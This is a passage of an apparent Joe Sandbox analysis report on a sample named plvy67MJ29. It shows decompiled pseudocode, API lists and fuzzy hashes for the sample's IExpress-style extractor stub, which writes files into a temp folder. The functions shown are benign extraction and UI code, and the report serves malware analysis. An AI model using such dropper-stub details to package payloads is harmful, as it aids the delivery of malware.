                                                                                                                                                                                                      • Part of subcall function 00FD468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46EF
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,00FD30B4), ref: 00FD4189
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,00FD30B4), ref: 00FD41E7
                                                                                                                                                                                                      • Part of subcall function 00FD44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00FD4518
                                                                                                                                                                                                      • Part of subcall function 00FD44B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00FD4554
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                    • String ID: <None>$FINISHMSG
                                                                                                                                                                                                    • API String ID: 3507850446-3091758298
                                                                                                                                                                                                    • Opcode ID: 974b84cb832ac8e543c941529093c5e56e75f41cd20d17407a87938402b4777c
                                                                                                                                                                                                    • Instruction ID: 39fcb3fb7cede4fd6325b311bddf85128023692f6be370311248ed6bb46c38ec
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 974b84cb832ac8e543c941529093c5e56e75f41cd20d17407a87938402b4777c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CC01ADA27002183BE3261A758C86F7B628FEB95795F184027B706E27809A79EC417179
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                    			E00FD19E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v520;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t11;
                                                                                                                                                                                                    				void* _t14;
                                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                    				void* _t33;
                                                                                                                                                                                                    				struct HWND__* _t34;
                                                                                                                                                                                                    				signed int _t35;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t33 = __edi;
                                                                                                                                                                                                    				_t27 = __ebx;
                                                                                                                                                                                                    				_t11 =  *0xfd8004; // 0x42de454f
                                                                                                                                                                                                    				_v8 = _t11 ^ _t35;
                                                                                                                                                                                                    				_t34 = _a4;
                                                                                                                                                                                                    				_t14 = _a8 - 0x110;
                                                                                                                                                                                                    				if(_t14 == 0) {
                                                                                                                                                                                                    					_t32 = GetDesktopWindow();
                                                                                                                                                                                                    					E00FD43D0(_t34, _t15);
                                                                                                                                                                                                    					_v520 = 0;
                                                                                                                                                                                                    					LoadStringA( *0xfd9a3c, _a16,  &_v520, 0x200);
                                                                                                                                                                                                    					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                                                                                                                                                    					MessageBeep(0xffffffff);
                                                                                                                                                                                                    					goto L6;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					if(_t14 != 1) {
                                                                                                                                                                                                    						L4:
                                                                                                                                                                                                    						_t23 = 0;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t32 = _a12;
                                                                                                                                                                                                    						if(_t32 - 0x83d > 1) {
                                                                                                                                                                                                    							goto L4;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							EndDialog(_t34, _t32);
                                                                                                                                                                                                    							L6:
                                                                                                                                                                                                    							_t23 = 1;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00FD6CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                                                                                                                    			}













                                                                                                                                                                                                    0x00fd19e0
                                                                                                                                                                                                    0x00fd19e0
                                                                                                                                                                                                    0x00fd19eb
                                                                                                                                                                                                    0x00fd19f2
                                                                                                                                                                                                    0x00fd19f9
                                                                                                                                                                                                    0x00fd19fc
                                                                                                                                                                                                    0x00fd1a01
                                                                                                                                                                                                    0x00fd1a2a
                                                                                                                                                                                                    0x00fd1a2e
                                                                                                                                                                                                    0x00fd1a3e
                                                                                                                                                                                                    0x00fd1a4f
                                                                                                                                                                                                    0x00fd1a62
                                                                                                                                                                                                    0x00fd1a6a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd1a03
                                                                                                                                                                                                    0x00fd1a06
                                                                                                                                                                                                    0x00fd1a20
                                                                                                                                                                                                    0x00fd1a20
                                                                                                                                                                                                    0x00fd1a08
                                                                                                                                                                                                    0x00fd1a08
                                                                                                                                                                                                    0x00fd1a14
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd1a16
                                                                                                                                                                                                    0x00fd1a18
                                                                                                                                                                                                    0x00fd1a70
                                                                                                                                                                                                    0x00fd1a72
                                                                                                                                                                                                    0x00fd1a72
                                                                                                                                                                                                    0x00fd1a14
                                                                                                                                                                                                    0x00fd1a06
                                                                                                                                                                                                    0x00fd1a81

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EndDialog.USER32(?,?), ref: 00FD1A18
                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00FD1A24
                                                                                                                                                                                                    • LoadStringA.USER32(?,?,00000200), ref: 00FD1A4F
                                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00FD1A62
                                                                                                                                                                                                    • MessageBeep.USER32(000000FF), ref: 00FD1A6A
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1273765764-0
                                                                                                                                                                                                    • Opcode ID: 5eef977b97c7d600545a36069b425b8535cd458e02fba0d62a5d9492d4293295
                                                                                                                                                                                                    • Instruction ID: fbb11a4915c7318206bf461ef95514d8994d81e75160800029fcff9291775582
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5eef977b97c7d600545a36069b425b8535cd458e02fba0d62a5d9492d4293295
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E118E3150211DABDB10EFB8DD08BAE77BAFB49310F148156F92293291DA349E05FB95
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E00FD7155() {
                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                    				struct _FILETIME _v16;
                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                    				union _LARGE_INTEGER _v24;
                                                                                                                                                                                                    				signed int _t23;
                                                                                                                                                                                                    				signed int _t36;
                                                                                                                                                                                                    				signed int _t37;
                                                                                                                                                                                                    				signed int _t39;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                                                                                                                                                    				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                                                                                                                                                    				_t23 =  *0xfd8004; // 0x42de454f
                                                                                                                                                                                                    				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                                                                                                                                                    					GetSystemTimeAsFileTime( &_v16);
                                                                                                                                                                                                    					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                                                                                                                                                    					_v8 = _v8 ^ GetCurrentProcessId();
                                                                                                                                                                                                    					_v8 = _v8 ^ GetCurrentThreadId();
                                                                                                                                                                                                    					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                                                                                                                                                    					QueryPerformanceCounter( &_v24);
                                                                                                                                                                                                    					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                                                                                                                                                    					_t39 = _t36;
                                                                                                                                                                                                    					if(_t36 == 0xbb40e64e || ( *0xfd8004 & 0xffff0000) == 0) {
                                                                                                                                                                                                    						_t36 = 0xbb40e64f;
                                                                                                                                                                                                    						_t39 = 0xbb40e64f;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					 *0xfd8004 = _t39;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t37 =  !_t36;
                                                                                                                                                                                                    				 *0xfd8008 = _t37;
                                                                                                                                                                                                    				return _t37;
                                                                                                                                                                                                    			}











                                                                                                                                                                                                    0x00fd715d
                                                                                                                                                                                                    0x00fd7161
                                                                                                                                                                                                    0x00fd7165
                                                                                                                                                                                                    0x00fd7178
                                                                                                                                                                                                    0x00fd7182
                                                                                                                                                                                                    0x00fd718e
                                                                                                                                                                                                    0x00fd7197
                                                                                                                                                                                                    0x00fd71a0
                                                                                                                                                                                                    0x00fd71b1
                                                                                                                                                                                                    0x00fd71b8
                                                                                                                                                                                                    0x00fd71c4
                                                                                                                                                                                                    0x00fd71c7
                                                                                                                                                                                                    0x00fd71cb
                                                                                                                                                                                                    0x00fd71d5
                                                                                                                                                                                                    0x00fd71da
                                                                                                                                                                                                    0x00fd71da
                                                                                                                                                                                                    0x00fd71dc
                                                                                                                                                                                                    0x00fd71dc
                                                                                                                                                                                                    0x00fd71e2
                                                                                                                                                                                                    0x00fd71e5
                                                                                                                                                                                                    0x00fd71ee

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00FD7182
                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00FD7191
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00FD719A
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00FD71A3
                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 00FD71B8
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1445889803-0
                                                                                                                                                                                                    • Opcode ID: f09d267ed96fbfbceedde32e553831f170b2fa0be1ef3e57478aa9cf85cfc413
                                                                                                                                                                                                    • Instruction ID: ab6f5c8837430318a6ad7125fb8d619918b4935968022906fc758f7b8b8d3064
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f09d267ed96fbfbceedde32e553831f170b2fa0be1ef3e57478aa9cf85cfc413
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F8113A71D0620CDBCB10DFB8DA48A9EB7F6EF08310F654957D801E7214EA309A05AF45
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                                                                                    			E00FD63C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				long _v272;
                                                                                                                                                                                                    				void* _v276;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t15;
                                                                                                                                                                                                    				long _t28;
                                                                                                                                                                                                    				struct _OVERLAPPED* _t37;
                                                                                                                                                                                                    				void* _t39;
                                                                                                                                                                                                    				signed int _t40;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t15 =  *0xfd8004; // 0x42de454f
                                                                                                                                                                                                    				_v8 = _t15 ^ _t40;
                                                                                                                                                                                                    				_v272 = _v272 & 0x00000000;
                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                    				_v276 = _a16;
                                                                                                                                                                                                    				_t37 = 1;
                                                                                                                                                                                                    				E00FD1781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP003.TMP\");
                                                                                                                                                                                                    				E00FD658A( &_v268, 0x104, _a12);
                                                                                                                                                                                                    				_t28 = 0;
                                                                                                                                                                                                    				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                                                                                                                                    				if(_t39 != 0xffffffff) {
                                                                                                                                                                                                    					_t28 = _a4;
                                                                                                                                                                                                    					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                                                                                                                                                                    						 *0xfd9124 = 0x80070052;
                                                                                                                                                                                                    						_t37 = 0;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					CloseHandle(_t39);
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					 *0xfd9124 = 0x80070052;
                                                                                                                                                                                                    					_t37 = 0;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00FD6CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                                                                                                                                                                    			}















                                                                                                                                                                                                    0x00fd63cb
                                                                                                                                                                                                    0x00fd63d2
                                                                                                                                                                                                    0x00fd63d8
                                                                                                                                                                                                    0x00fd63ea
                                                                                                                                                                                                    0x00fd63f3
                                                                                                                                                                                                    0x00fd6401
                                                                                                                                                                                                    0x00fd6402
                                                                                                                                                                                                    0x00fd6410
                                                                                                                                                                                                    0x00fd6415
                                                                                                                                                                                                    0x00fd6433
                                                                                                                                                                                                    0x00fd6438
                                                                                                                                                                                                    0x00fd6449
                                                                                                                                                                                                    0x00fd6463
                                                                                                                                                                                                    0x00fd646d
                                                                                                                                                                                                    0x00fd6477
                                                                                                                                                                                                    0x00fd6477
                                                                                                                                                                                                    0x00fd647a
                                                                                                                                                                                                    0x00fd643a
                                                                                                                                                                                                    0x00fd643a
                                                                                                                                                                                                    0x00fd6444
                                                                                                                                                                                                    0x00fd6444
                                                                                                                                                                                                    0x00fd6492

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 00FD642D
                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 00FD645B
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 00FD647A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 00FD63EB
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\
                                                                                                                                                                                                    • API String ID: 1065093856-256195474
                                                                                                                                                                                                    • Opcode ID: 0aa9cc22561c39a025370f49c87f9e301c33554b9492ea2c8b0faeb743f87bf2
                                                                                                                                                                                                    • Instruction ID: e6a41584651e10e13f7d9f400176f7d83445c85866d8740f243ef41b00c9c78c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0aa9cc22561c39a025370f49c87f9e301c33554b9492ea2c8b0faeb743f87bf2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: EF210271A0021CABCB10DF65DC85FEB736AEB45310F0401AAF584E3280CAB46D84AFA4
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E00FD47E0(intOrPtr* __ecx) {
                                                                                                                                                                                                    				intOrPtr _t6;
                                                                                                                                                                                                    				intOrPtr _t9;
                                                                                                                                                                                                    				void* _t11;
                                                                                                                                                                                                    				void* _t19;
                                                                                                                                                                                                    				intOrPtr* _t22;
                                                                                                                                                                                                    				void _t24;
                                                                                                                                                                                                    				struct HWND__* _t25;
                                                                                                                                                                                                    				struct HWND__* _t26;
                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                    				intOrPtr* _t28;
                                                                                                                                                                                                    				intOrPtr* _t33;
                                                                                                                                                                                                    				void* _t34;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t33 = __ecx;
                                                                                                                                                                                                    				_t34 = LocalAlloc(0x40, 8);
                                                                                                                                                                                                    				if(_t34 != 0) {
                                                                                                                                                                                                    					_t22 = _t33;
                                                                                                                                                                                                    					_t27 = _t22 + 1;
                                                                                                                                                                                                    					do {
                                                                                                                                                                                                    						_t6 =  *_t22;
                                                                                                                                                                                                    						_t22 = _t22 + 1;
                                                                                                                                                                                                    					} while (_t6 != 0);
                                                                                                                                                                                                    					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                                                                                                                                                                    					 *_t34 = _t24;
                                                                                                                                                                                                    					if(_t24 != 0) {
                                                                                                                                                                                                    						_t28 = _t33;
                                                                                                                                                                                                    						_t19 = _t28 + 1;
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_t9 =  *_t28;
                                                                                                                                                                                                    							_t28 = _t28 + 1;
                                                                                                                                                                                                    						} while (_t9 != 0);
                                                                                                                                                                                                    						E00FD1680(_t24, _t28 - _t19 + 1, _t33);
                                                                                                                                                                                                    						_t11 =  *0xfd91e0; // 0x33d8f70
                                                                                                                                                                                                    						 *(_t34 + 4) = _t11;
                                                                                                                                                                                                    						 *0xfd91e0 = _t34;
                                                                                                                                                                                                    						return 1;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t25 =  *0xfd8584; // 0x0
                                                                                                                                                                                                    					E00FD44B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                    					LocalFree(_t34);
                                                                                                                                                                                                    					L2:
                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t26 =  *0xfd8584; // 0x0
                                                                                                                                                                                                    				E00FD44B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                                                                                                                                                                    				goto L2;
                                                                                                                                                                                                    			}















                                                                                                                                                                                                    0x00fd47e8
                                                                                                                                                                                                    0x00fd47f0
                                                                                                                                                                                                    0x00fd47f4
                                                                                                                                                                                                    0x00fd480f
                                                                                                                                                                                                    0x00fd4811
                                                                                                                                                                                                    0x00fd4814
                                                                                                                                                                                                    0x00fd4814
                                                                                                                                                                                                    0x00fd4816
                                                                                                                                                                                                    0x00fd4817
                                                                                                                                                                                                    0x00fd4829
                                                                                                                                                                                                    0x00fd482b
                                                                                                                                                                                                    0x00fd482f
                                                                                                                                                                                                    0x00fd484f
                                                                                                                                                                                                    0x00fd4852
                                                                                                                                                                                                    0x00fd4855
                                                                                                                                                                                                    0x00fd4855
                                                                                                                                                                                                    0x00fd4857
                                                                                                                                                                                                    0x00fd4858
                                                                                                                                                                                                    0x00fd4860
                                                                                                                                                                                                    0x00fd4865
                                                                                                                                                                                                    0x00fd486a
                                                                                                                                                                                                    0x00fd486f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd4876
                                                                                                                                                                                                    0x00fd4831
                                                                                                                                                                                                    0x00fd4841
                                                                                                                                                                                                    0x00fd4847
                                                                                                                                                                                                    0x00fd480b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd480b
                                                                                                                                                                                                    0x00fd47f6
                                                                                                                                                                                                    0x00fd4806
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00FD4E6F), ref: 00FD47EA
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00FD4823
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00FD4847
                                                                                                                                                                                                      • Part of subcall function 00FD44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00FD4518
                                                                                                                                                                                                      • Part of subcall function 00FD44B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00FD4554
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 00FD4851
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\
                                                                                                                                                                                                    • API String ID: 359063898-256195474
                                                                                                                                                                                                    • Opcode ID: 029735e2472be3696f5591482065ff59bc99f2297c345db7f90537b313abf698
                                                                                                                                                                                                    • Instruction ID: 7a58579bed4196500a3b1e04c6964e39bc08d3ca9263207d9fa87a838cf7b181
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 029735e2472be3696f5591482065ff59bc99f2297c345db7f90537b313abf698
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 321106756056426FD7158F34EC18F723B6BEB85390F08851BE94297381DA35AC06B660
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E00FD3680(void* __ecx) {
                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                    				struct tagMSG _v36;
                                                                                                                                                                                                    				int _t8;
                                                                                                                                                                                                    				struct HWND__* _t16;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_v8 = __ecx;
                                                                                                                                                                                                    				_t16 = 0;
                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                    					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                                                                                                                                                                    					if(_t8 == 0) {
                                                                                                                                                                                                    						break;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							if(_v36.message != 0x12) {
                                                                                                                                                                                                    								DispatchMessageA( &_v36);
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t16 = 1;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                                                                                                                                                                    						} while (_t8 != 0);
                                                                                                                                                                                                    						if(_t16 == 0) {
                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					break;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _t8;
                                                                                                                                                                                                    			}







                                                                                                                                                                                                    0x00fd368c
                                                                                                                                                                                                    0x00fd368f
                                                                                                                                                                                                    0x00fd3691
                                                                                                                                                                                                    0x00fd369f
                                                                                                                                                                                                    0x00fd36a7
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd36ba
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd36bc
                                                                                                                                                                                                    0x00fd36bc
                                                                                                                                                                                                    0x00fd36c0
                                                                                                                                                                                                    0x00fd36cb
                                                                                                                                                                                                    0x00fd36c2
                                                                                                                                                                                                    0x00fd36c4
                                                                                                                                                                                                    0x00fd36c4
                                                                                                                                                                                                    0x00fd36da
                                                                                                                                                                                                    0x00fd36e0
                                                                                                                                                                                                    0x00fd36e6
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd36e6
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd36ba
                                                                                                                                                                                                    0x00fd36ed

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00FD369F
                                                                                                                                                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00FD36B2
                                                                                                                                                                                                    • DispatchMessageA.USER32(?), ref: 00FD36CB
                                                                                                                                                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00FD36DA
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2776232527-0
                                                                                                                                                                                                    • Opcode ID: 24fa9c10ed26554529d24a5d159c5fe6817c35b8c8c6b96af80b0b6bde0a6673
                                                                                                                                                                                                    • Instruction ID: bf3520d3413fc59ebe5f7ef5a3a00d560aeadbb883c094cfbd42e7c4066794c2
